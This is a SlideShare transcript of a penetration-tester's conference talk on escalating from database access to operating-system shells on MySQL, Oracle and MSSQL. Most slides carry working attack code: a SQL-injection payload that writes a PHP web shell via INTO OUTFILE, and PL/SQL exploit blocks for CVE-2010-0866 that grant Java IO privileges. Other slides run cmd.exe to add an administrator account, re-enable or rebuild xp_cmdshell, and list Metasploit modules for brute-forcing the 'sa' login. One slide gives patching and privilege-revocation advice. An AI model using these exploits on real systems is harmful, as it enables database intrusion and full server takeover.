Your SlideShare is downloading. ×
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Rock'n Roll in Database S
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Rock'n Roll in Database S

1,035

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,035
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
31
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Rock'n Roll in Database Security Prathan Phongthiproek (Lucifer@CITEC) Senior Information Security Consultant ACIS ProfessionalCenter
  • 2. Who am I ?  CITEC Evolution  Code Name “Lucifer”, Moderator, Speaker  Instructor: Web Application (In) Security 101  Instructor: Mastering in Exploitation  ACIS ProfessionalCenter  RedTeam : Penetration Tester  Instructor / Speaker  Security Consultant / Researcher  Founder of CWH Underground Hacker  Exploits,Vulnerabilities, Papers Disclosure  Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc  http://www.exploit-db.com/author/?a=1275
  • 3. Let’sTalk !? “Get DBA privilege is good but get SHELL is better !!”  MySQL PWNED !! From Web Application to get SHELL  Oracle Escalating Privilege XPL For get SHELL  MSSQL Credentials Attack For get SHELL
  • 4. MSSQL and OracleVulnerabilities 0 40 80 120 160 2002 2003 2004 2005 2006 2007 2008 2009 24 3 0 0 0 0 11 0 46 12 25 61 144 41 48 36 SQL Server Oracle
  • 5. MySQL Jump into OS  MySQL5.xVulnerability, 0-Day on Immunity CANVAS  SQL Injection viaWeb Application (Top Hit !!)  MySQL Outfile Function  Need writable directory  Need Absolute path  Need Magic_quote off  Union select 1,‘code’,3,4 into outfile “/www/htdocs/shell.php”  MySQL Load_file Function (Better !!)  Need Absolute path  Need phpMyAdmin path or MySQL 3306 was opened at firewall  Union select 1,load_file(0x4332…………)
  • 6. MySQL PWNED !! FromWeb Application to get SHELL
  • 7. Oracle Escalating Privilege XPL For get SHELL – PL/SQL Injection  Dbms_cdc_publish3 – For Oracle 10gR1-11gR2  Dbms_cdc_publish2  Dbms_cdc_publish  Dbms_metadata_open  Dbms_export_extension  It_findricset_cursor  It_compressworkspace  It_mergeworkspace  It_removeworkspace  It_rollbackworkspace
  • 8. Oracle Escalating Privilege XPL For get SHELL  DBMS_JVM_EXP_PERMS package that allow any user create privilege to grant themselves java IO Privileges  CVE-2010-0866  Affect Oracle 10g-11g (Windows Only)  Defense  Apply October 2010 Critical Patch Update  Oracle 11gR2 onWindows still secure  Revoke privileges from users to execute DBMS_JVM_EXP_PERMS
  • 9. Oracle Escalating Privilege XPL For get SHELL  XPL Code (Grant JAVA IO Privilege)  DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission',’<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;  DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;  DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
  • 10. Oracle Escalating Privilege XPL For get SHELL  XPL Code (OS Execute)  select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:windows system32cmd.exe', '/c', ’net user prathan 1234 /add’) from dual;  select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:windows system32cmd.exe', '/c', ’net localgroup administrators prathan /add’) from dual;
  • 11. Oracle Escalating Privilege XPL For get SHELL
  • 12. MSSQL CredentialsAttack For get SHELL  ‘SA’ is God Account, Run with SYSTEM Privilege onWindows  Default ‘sa’ password is blank password or guessable  Require “xp_cmdshell” stored procedures (Disable by default on MSSQL 2005+)  Enabled it with osql  On MSSQL 2005  EXEC sp_configure ‘show advanced options’, 1 RECONFIGURE EXEC sp_configure ‘xp_cmdshell’, 1 RECONFIGURE
  • 13. MSSQL CredentialsAttack For get SHELL  On MSSQL 2000  Xp_cmdshell was drop by sp_dropextendedproc  EXEC sp_addextendedproc ‘xp_anyname’, ‘xp_log70.dll’  CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS DECLARE @result int, @OLEResult int, @RunResult int DECLARE @ShellID int EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult) EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult) EXECUTE @OLEResult = sp_OADestroy @ShellID return @result
  • 14. MSSQL CredentialsAttack For get SHELL  Brute-Force ‘sa’ password and use sa credentials to run os command on target machine with Metasploit modules  Scanner/mssql/mssql_ping  Scanner/mssql/mssql_login  Admin/mssql/mssql_exec  Windows/smb/psexec
  • 15. IPWN4 – PenTestTools (Jail-Broken)  Pen-TestTools (Command-line)  Metasploit Framework  Social Engineering Toolkit  Nmap Scanner, Amap, Hping  Nbtscan, netcat  Nikto2, dnsmap  Ettercap-NG, Aircrack-NG  GUITools  iTeleport  Jaadu RDP  iNet  WiFiFoFum
  • 16. Full Compromise MSSQL via Iphone4

×